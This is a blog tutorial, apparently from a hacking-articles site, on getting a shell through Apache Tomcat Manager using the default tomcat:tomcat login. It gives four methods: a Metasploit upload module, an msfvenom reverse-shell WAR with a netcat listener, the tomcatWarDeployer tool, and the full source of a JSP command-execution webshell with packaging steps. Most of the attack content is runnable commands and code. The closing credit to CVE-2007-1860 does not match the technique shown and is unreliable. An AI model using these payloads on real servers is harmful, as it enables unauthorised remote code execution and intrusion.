Multiple Ways to Exploit Tomcat Manager
Hello Friends, today through this article I would like to share my experience “how to exploit Tomcat Manger Application” if you have default login credential (tomcat: tomcat). While playing CTF, many times I found Apache Tomcat is running in target machine that have configured with default login and this can help us to get remote machine shell. Therefore I feel, I should write all possible ways to exploit tomcat manger application to gaining webshell of remote machine.
Table of Content
- Tomcat Manager Authenticated Upload Code Execution
- Generate .war Format Backdoor
- Tomcat War Deployer Script
- Generate a JSP Webshell
Let’s start with nmap scan and to tomcat service check port 8080 as tomcat.
nmap -sV -p8080 192.168.1.101
From nmap output result, we found port 8080 is open for Apache Tomcat. So we navigate to web browser and on exploring Target IP: port we saw HTTP authentication page to login in tomcat manger application.
Tomcat Manager Authenticated Upload Code Execution
This module can be used to execute a payload on Apache Tomcat servers that have an exposed “manager” application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost 192.168.1.101
msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername tomcat
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword tomcat
msf exploit(multi/http/tomcat_mgr_upload) > exploit
As result you can observe that, we have meterpreter session of the target machine.
Generate .war Format Backdoor
We can use msfvenom for generating a .war format backdoor for java/jsp payload, all you need to do is just follow the given below syntax to create .war format file and then run netcat listener.
Syntax: msfvenom -p [payload] LHOST=[Kali Linux IP] LPORT=[1234] -f [file format] > [file name]
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=1234 -f war > shell.war
nc -lvp 1234
Now login to tomcat manager application using tomcat: tomcat as username: password. You will be welcomed by admin dashboard where you can upload a .war file.
As you can observe I had browser the malicious shell.war file to be deploy as highlighted in the image. As soon as you will upload your file, you will saw the /path entry for your file in the table of Applications
To execute your .war file, you have to click on the /.war file path mention in the Application table. Or you can directly explore http://target_IP:port/file_name.
As soon as you will execute your file you will get reverse connection through netcat.
Booom!!! One more time we have access remote webshell.
Tomcat War Deployer Script
This is a penetration testing tool intended to leverage Apache Tomcat credentials in order to automatically generate and deploy JSP Backdoor, as well as invoke it afterwards and provide nice shell (either via web gui, listening port binded on remote machine or as a reverse tcp payload connecting back to the adversary).
In practice, it generates JSP backdoor WAR package on-the-fly and deploys it at the Apache Tomcat Manager Application, using valid HTTP Authentication credentials that pentester provided (or custom ones, in the end, we all love tomcat:tomcat ).
You can download it from here: https://github.com/mgeeky/tomcatWarDeployer
git clone https://github.com/mgeeky/tomcatWarDeployer
cd tomcatWarDeployer
ls
Now follow the syntax to exploit the target machine without uploading .war file manually.
Syntax : ./tomcatWarDeployer.py -U [usrename] -p [password]-H [Kali Linux IP]-p [Listening port] [target_IP]:[tomcat_port]
./tomcatWarDeployer.py -U tomcat -P tomcat -H 192.168.1.108 -p 4567 192.168.1.101:8080
On executing above command, I got webshell directly as you can observe it in the given below image.
Generate a JSP Webshell
In this part, we are going to see how we can generate and deploy a Webshell to gain command execution on the Tomcat manger application.
First, we will need to write the Webshell and package it as a .war file format. To write the jsp Webshell, we are using the following code which I found from from this Link: https://ift.tt/2QxYVCS
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+""; }
} catch(IOException e) { e.printStackTrace(); }
}
%><%=output %>
Save the code as index.jsp and then execute following command to package it as .war file.
mkdir webshell
cp index.jsp webshell/
cd webshell
jar -cvf ../webshell.war *
With the help of above command you will get a war file, which you can deploy in tomcat manger application.
As you can observe from the given below image, I had deployed my webshell.war file which successfully uploaded, now let’s click on this file for its execution.
On executing /webshell you will get a HTTP 404 error, now execute index.jsp file in the as given below:
http://192.168.1.106:8080/webshell/index.jsp
On executing above URL you will get command execution form, now use it wisely to cmd commands.
Hopefully! You have enjoyed this article how to get access to the Tomcat manager using CVE-2007-1860.
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
The post Multiple Ways to Exploit Tomcat Manager appeared first on Hacking Articles.
from Hacking Articles https://ift.tt/2S34IwV